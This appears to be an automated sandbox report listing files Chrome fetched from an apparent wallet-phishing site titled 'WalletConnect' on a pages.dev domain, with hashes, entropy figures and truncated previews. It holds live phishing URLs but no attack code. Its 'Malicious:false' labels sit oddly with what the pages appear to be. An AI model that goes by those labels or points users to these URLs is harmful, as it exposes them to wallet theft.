                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:mSfSICkuDjn:mSf+kuf
                                                                                                                                                                                                                                              MD5:84B82A8F358AB87431EC50E2FEE84521
                                                                                                                                                                                                                                              SHA1:16BB65A4391DD2887F1EB426C50E1C994B1CC873
                                                                                                                                                                                                                                              SHA-256:80F7C86B97D0C67D57476BBBCD84C5294DE694415FB0EBFB105ED583878464DA
                                                                                                                                                                                                                                              SHA-512:3E45DE24A949788697D7737A00076735994D42461B225535E18DA7BD2453D106750DB67DD64AB8AD3AF3703EF21F9711FCADBD2BC4C61F22BE17C272F0037B40
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISHgmypSWZPWJW5BIFDQbtu_8SBQ1TWkfFEgUNvyRSkA==?alt=proto
                                                                                                                                                                                                                                              Preview:ChsKBw0G7bv/GgAKBw1TWkfFGgAKBw2/JFKQGgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):150357
                                                                                                                                                                                                                                              Entropy (8bit):5.405136612865824
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:AwlL47MnAPaiA2YudRCG0fW2MkdF5kpjm5L1ZVplqpU:AwlgMgaiA2YuX0+2MkdF5LL1/plqpU
                                                                                                                                                                                                                                              MD5:F1E1655DC1B6CBDB0354D29980882BB0
                                                                                                                                                                                                                                              SHA1:F433EF04877CD65555FD9CF56A2A3CD826B00199
                                                                                                                                                                                                                                              SHA-256:9034A1AD067DA69459A1BAAC888CFDD2C9320148F2546CEC38FFD0DD3347CE5F
                                                                                                                                                                                                                                              SHA-512:FF0F0E8E41A5D856CCC7FAADC7BD835394538C0B01F62571F38266D12522025FC0FCC611EC5172C327CC950DE1B1099DACC14EBBBE99EBA46D10B939746B0933
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://js.hcaptcha.com/1/api.js
                                                                                                                                                                                                                                              Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):75
                                                                                                                                                                                                                                              Entropy (8bit):4.70077390470751
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:JS0FIDX/ILCzRIB2DJCXcfZF3vn:e/IO9IB2DJCWv
                                                                                                                                                                                                                                              MD5:B6B7E47B8857F386F30C7E7C8D4F5699
                                                                                                                                                                                                                                              SHA1:396D008A6423C0FB0558CEF753998234AB13835F
                                                                                                                                                                                                                                              SHA-256:2506A267D9C079C6ED69E13736EFED41FDB20438A8598C6D767C74DA0DE10261
                                                                                                                                                                                                                                              SHA-512:632BB1B9E2496467ED1821CC71D52846A5D6EFE56C7455A6D6FCBE0DABBFCB49E33D350C6CA7607B27E5D5F341E0EC92D60DE482772E81E724B87E2719D4E80A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{t as r}from"./manifest-51a3674f.js";const a=t=>r(t);export{a as t};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 144 x 408, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7718
                                                                                                                                                                                                                                              Entropy (8bit):7.952598486162174
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:fNeJEVE6n63f/w+THnwZ81gwY+S/yrry+Q:fs16n6AMHnSF+goa
                                                                                                                                                                                                                                              MD5:55256987DA0B394FA475EBD2FECDD875
                                                                                                                                                                                                                                              SHA1:FE3511A17B542202446352A18C65C3FC601A150D
                                                                                                                                                                                                                                              SHA-256:B7B231B46D3CAF0EECAE7138F4F8D7331C747AD8369EEB1505FC64D99704475E
                                                                                                                                                                                                                                              SHA-512:F8F4F215F6AFF8B777DB6A16D1FD461405448ACA024485BC542BB16C18E752F15D48A1659D5E0D2E199C044EAE621C35499BC716463E2C64987D7B7768EC5B3B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR................S...zPLTE...X..X.. .X..$.#.X..X..$.X..$.X..P.. .#.$.X.....Y..#.#.X..%.#.W..W..X.....$.W..$.W..#.$.......$....X.....W..............W.....#....%.$....#....$.X..X..#....Y.....X..$.$.$.#.%....X..X......A.$.............3X.m..Pp....$M....|......Ad........_|.^|....}J2P.....%ln\..O_ozvS..@..7]ge.....7AXx$I...$H..........&A`...Vgz..Y..@.....m..B\.{~s..Z.>E....FtRNS.. `........`@@..o0..P@..0...A .p....`P@...p._P..`.Q0.....Oo..q.4.....IDATx..[.n$G..7.7............U.'H....9..EVU...0.e.....h...GVu.k.......7.......o....w^..p......x.._..?.;'G..>.3...L...L..?....N.....#...g...;o2.../.Z..7.....[o.......tf...........Du.o.(jt......fHn.j..$."..!i.tLK."..z.}.)E.j.5TB.....G...l..6......66...Qz._....s.\T4.H...3....7..(y{..h..h.K........N...44.S.-h....|t..|^?....5.u.fb...e@..d..T..m[.b|^%......G....l.~I.`.s...)...$..%q........V...BG..`.......A..)Z.(..l..x.<|..3.Mj.#@v....r..B(.@D...M....O..4>...J.;.-.:n .... ....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):8386
                                                                                                                                                                                                                                              Entropy (8bit):7.960749156089066
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:u8t8vORBs6MHo4u7W+i8sSllrtfJZ2LjNErVYil3cym2uX44O:fcOjHMHo4iiNSldtf6LjNqVYVRX44O
                                                                                                                                                                                                                                              MD5:323EDB4E743263AB16943F9C5329AC3A
                                                                                                                                                                                                                                              SHA1:101A41164B52FB56F633E54F2227EF80A0C13E2A
                                                                                                                                                                                                                                              SHA-256:E8794703352A80124910831E7A1C21E4D76F8E31A3B0BBCF428362D15A0396A7
                                                                                                                                                                                                                                              SHA-512:DA34A53057FCFE419B8FACF6BAF1681CFEC16C9D271675BB6F964376049FE6A3A45E5CD71AE1B3DF3FAA58D7A7BFC952C514D2179366FBF35C6A0CA16746D909
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/android-chrome-192x192.png
                                                                                                                                                                                                                                              Preview:RIFF. ..WEBPVP8L. ../../...m.FB.....p.. ....w%.....H"....U......p:..VU.tZ..N......4.H2".6p.ED0.{M~...@M..<......|.L .s.U..$'V..W.H'.RU=Ot.mr.F.U.t.|.PN..i6v......t..\@n.6....(l..?Mkf/.7.$9J.5..... bcb.m"I...C1...&...5+...........u...o....+P...E.....)..7...@..d..4.(...w.@L...."...!...2.r....fD.l.?_..0....J...x.S....(..~(".......x..6:..@..VT.....4Rq.R:B...1.FD...".W....J..v...,qL.R.g..@Dlq8.(._.....+.oD."..D..B.p.."x........u..@......A.Z.....L.+."..{,....!..m#IR....t..C "& ...<.-.....`[.....sJ.I...~.f......O....8...p.[2s%m..........@%.........._....w.....b.H.D.4'r...Hd....i..Z.....s..9/h..@s.#..5..%~.w..nubg.N.6.N.....Avd...\......A..8.G.B.m.!...w....m..D!P..,.Y..$.&.E`...&.9.*.@.......2...._$.......>.......a.....@.%33.q8...^{&..'..p.l]......-.._*U...t..*......3'm...flU8.].G.g.73.K......4.7.......#.vmE..>.1Us-. p...g...I.r....v...1.~..mi.-s5.R..2...@..}-......Bs.$\m(B....\s..c .0.....J....6.1.z.m[6...qw'..rr.....b6.....r..!..^..g.....]O5r
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):3394
                                                                                                                                                                                                                                              Entropy (8bit):7.7530171017488065
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:rGcsiy2VZvgbF2275c/HRE6uHsQbThU3SrCa:rGFMvghl75c/xx4bOG
                                                                                                                                                                                                                                              MD5:07D13F4F5E726EA27DBB3BC89C4E82AA
                                                                                                                                                                                                                                              SHA1:BD618EAE786900672485DE063E7C60112EEFF33F
                                                                                                                                                                                                                                              SHA-256:8416E00B7DA82F540D2CD282C8306D1B64251949EF4D311FB057670F843E941A
                                                                                                                                                                                                                                              SHA-512:E29969DB17E3D7BDFE0B5824E1D941774DBBE4A0A9E8EE0F65226922C0AE98DB9F9D3014C3C8E9783685482604AA4164DA65E871F0F026F09F998DCAC06DAD62
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://d107ul3j3wrui0.cloudfront.net/up/asset/dc38ec7be7/2031a41ecc.png?w=728&h=90
                                                                                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@................... .................z...8iinf..........infe........av01.....infe........av01.....iprp....ipco....colrnclx...........av1C........ispe...........Z....pixi.........8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....av1C........pixi............ipma..........................iref........auxl..........mdat.....%.{,.2.....D..VF`.K.....e$.....%.{,...h@2..D.....Vh...L.T..c1.J...{..C..^......WZ..^...x..o{...+..G...dtL.s..b.......3.q......:...C....z5j.....7w'......PmW.......o...U/>t.#.....Z.Q..}..ZO...(.#+6.-..~.z....7K......P.j7`....?.!#...b=./,......};U.V...0!.&<....$|........P..G........;.v..<..i..`..C....|...m.P.c_.jGg.k..D....s..T.......8..C.~H].g2...$`6..<.H(w..s.[....!.z..b.Y...=..;.w"...n.|]H.;.`....}..+.....H..=...X.eQ.......z.._..9>K..z..GDFL.H.....4.a.....g.[NGY....?....3.T^...@M..0...M..........ama.{.G.*...s..,..Q.T_zZ.b
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):110
                                                                                                                                                                                                                                              Entropy (8bit):4.81880974721583
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:TMQBSgOKHAA9NR1JXXEYftR0lpe5XLrYBSpFYv:Ayx9HAGrXpftR+GqSMv
                                                                                                                                                                                                                                              MD5:20ABA28B5A7232E93A147AA7CF22BBC2
                                                                                                                                                                                                                                              SHA1:DDA6C9793630535E18A8DB337FADDED09023877C
                                                                                                                                                                                                                                              SHA-256:684BF7E6CE1430D7A6CFA900F3B5AABB9F1D66A0DCB55D916065A28E79693E3E
                                                                                                                                                                                                                                              SHA-512:AB2397E34011934CA62C8DCA568580EED8F55924573BD8BFDB3E273EC7ED9A04A9BD5BEC09AEC75662F76E3AE3829716FC61DF5957B9960067C4EC76253A4E49
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:function h(e,u){for(var n=-1,l=e==null?0:e.length,t=Array(l);++n<l;)t[n]=u(e[n],n,e);return t}export{h as a};.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (50697)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):69922
                                                                                                                                                                                                                                              Entropy (8bit):5.335878099877619
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:9L7WOhmzL8s/m144wKxfMoSSfv0Yae9LYlpEogGp1Tz9mMOe8:9f9mzosPjKaQAQGDzVT8
                                                                                                                                                                                                                                              MD5:A2FC4B55ABA9142769FAFBC4D8E1B5C5
                                                                                                                                                                                                                                              SHA1:C27D2E10A1D75B6C6D73FE8D20EDB4EE66E11474
                                                                                                                                                                                                                                              SHA-256:D4A0756571B5460E1303636D818FC50A69B5960E25C5D49E253C9AA4E19F2B9C
                                                                                                                                                                                                                                              SHA-512:5429493293AAF2D983B7F33C91E2808E5D183CBC1A47E5B2669EBBFB7D2A990EB8A6CC1712C356DF5BFC4F55466312C1F2FDA07D3FFBE8A2A986DA3D7F7F6A8B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:function mt(f){if(f===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return f}function Ei(f,t){f.prototype=Object.create(t.prototype),f.prototype.constructor=f,f.__proto__=t}/*!. * GSAP 3.12.5. * https://gsap.com. *. * @license Copyright 2008-2024, GreenSock. All rights reserved.. * Subject to the terms at https://gsap.com/standard-license or for. * Club GSAP members, the agreement issued with that membership.. * @author: Jack Doyle, jack@greensock.com.*/var rt={autoSleep:120,force3D:"auto",nullTargetWarn:1,units:{lineHeight:""}},$t={duration:.5,overwrite:!1,delay:0},Je,W,E,at=1e8,A=1/at,Be=Math.PI*2,Rr=Be/4,Er=0,zi=Math.sqrt,zr=Math.cos,Fr=Math.sin,X=function(t){return typeof t=="string"},L=function(t){return typeof t=="function"},yt=function(t){return typeof t=="number"},ti=function(t){return typeof t=="undefined"},dt=function(t){return typeof t=="object"},Q=function(t){return t!==!1},ei=function(){return typeof window!="undefined"},pe=fu
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/style.css
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3169)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):232103
                                                                                                                                                                                                                                              Entropy (8bit):5.550539708669732
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:uhURLxI5x52A415QyqVho8HMTm8iWCvK4sxgvN3Jx:unvA5QyqccyhiWCvbv3x
                                                                                                                                                                                                                                              MD5:312C8EFA7C577527ED629F4C3371C0E4
                                                                                                                                                                                                                                              SHA1:82BA9C0BFC81A383E159802AB3E9C68F53894F50
                                                                                                                                                                                                                                              SHA-256:818CBBAF90F3D34FB9B3019E37D855531241967D398D06FF9B195F91DF944A5A
                                                                                                                                                                                                                                              SHA-512:21CECC74A63DDA3E47040F1EAA7CC0EB47A8FCD0B7964976C7E3F90663113E9647723D0DC682207CA5B5F0CD4D28A148035E7E6470F8CC35F62218E86650601F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://accounts.google.com/gsi/client
                                                                                                                                                                                                                                              Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x11620000, 0xe05, ]);.var aa,ba,ca,da,t,ea,ha,ia,ka;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writab
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
